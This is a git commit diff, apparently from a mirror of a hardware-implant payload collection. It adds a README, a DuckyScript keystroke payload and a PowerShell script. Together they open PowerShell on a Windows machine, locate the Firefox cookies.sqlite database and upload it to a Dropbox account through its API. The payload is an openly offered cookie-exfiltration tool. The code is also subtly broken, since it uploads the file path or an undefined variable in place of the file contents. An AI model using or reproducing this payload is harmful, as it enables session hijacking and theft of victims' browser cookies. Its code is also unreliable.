mirror of https://github.com/hak5/omg-payloads.git
commit
942c3eeb7f
|
@ -0,0 +1,21 @@
|
||||||
|
# Export Firefox Cookies Database
|
||||||
|
|
||||||
|
This script may come in handy for those who want to quickly save all the cookies of their Firefox session by exporting the database via dropbox accesstoken.
|
||||||
|
|
||||||
|
**Category**: Exfiltration
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This script may come in handy for those who want to quickly save all the cookies of their Firefox session by exporting the database via dropbox accesstoken.
|
||||||
|
|
||||||
|
Open a PowerShell, select dynamically the Firefox path adding "cookies.sqlite" at the end, then set your exfiltration settings i.e. Dropbox access token and so on... then export it, then close the powershell.
|
||||||
|
|
||||||
|
## Dependencies
|
||||||
|
|
||||||
|
* Firefox must be installed
|
||||||
|
|
||||||
|
## Settings
|
||||||
|
|
||||||
|
- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
|
||||||
|
|
||||||
|
`DEFINE DROPBOX_ACCESS_TOKEN "example"`
|
|
@ -0,0 +1,47 @@
|
||||||
|
REM ####################################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Export Firefox Cookies Database |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Exfiltration |
|
||||||
|
REM # Target : Windows 10-11 |
|
||||||
|
REM # |
|
||||||
|
REM ####################################################
|
||||||
|
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Firefox must be installed
|
||||||
|
|
||||||
|
|
||||||
|
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
|
||||||
|
DEFINE DROPBOX_ACCESS_TOKEN "example"
|
||||||
|
|
||||||
|
DEFAULT_DELAY 500
|
||||||
|
GUI r
|
||||||
|
STRINGLN powershell
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
|
REM Get cookies DB path
|
||||||
|
STRINGLN_BLOCK
|
||||||
|
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
|
||||||
|
$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
|
||||||
|
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
|
||||||
|
END_STRINGLN
|
||||||
|
|
||||||
|
REM Setting about exfiltration
|
||||||
|
STRINGLN $accessToken = DROPBOX_ACCESS_TOKEN
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
STRINGLN_BLOCK
|
||||||
|
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
|
||||||
|
|
||||||
|
$dropboxFilePath = "/cookies_exported.sqlite"
|
||||||
|
|
||||||
|
$headers = @{}
|
||||||
|
$headers.Add("Authorization", "Bearer $accessToken")
|
||||||
|
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
|
||||||
|
$headers.Add("Content-Type", "application/octet-stream")
|
||||||
|
|
||||||
|
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath; exit;
|
||||||
|
END_STRINGLN
|
|
@ -0,0 +1,19 @@
|
||||||
|
|
||||||
|
|
||||||
|
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
|
||||||
|
$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
|
||||||
|
|
||||||
|
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
|
||||||
|
|
||||||
|
$accessToken = ""
|
||||||
|
$authHeader = @{Authorization = "Bearer $accessToken"}
|
||||||
|
$dropboxFilePath = "/cookies_exported.sqlite"
|
||||||
|
|
||||||
|
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
|
||||||
|
|
||||||
|
$headers = @{}
|
||||||
|
$headers.Add("Authorization", "Bearer $accessToken")
|
||||||
|
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
|
||||||
|
$headers.Add("Content-Type", "application/octet-stream")
|
||||||
|
|
||||||
|
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent
|
Loading…
Reference in New Issue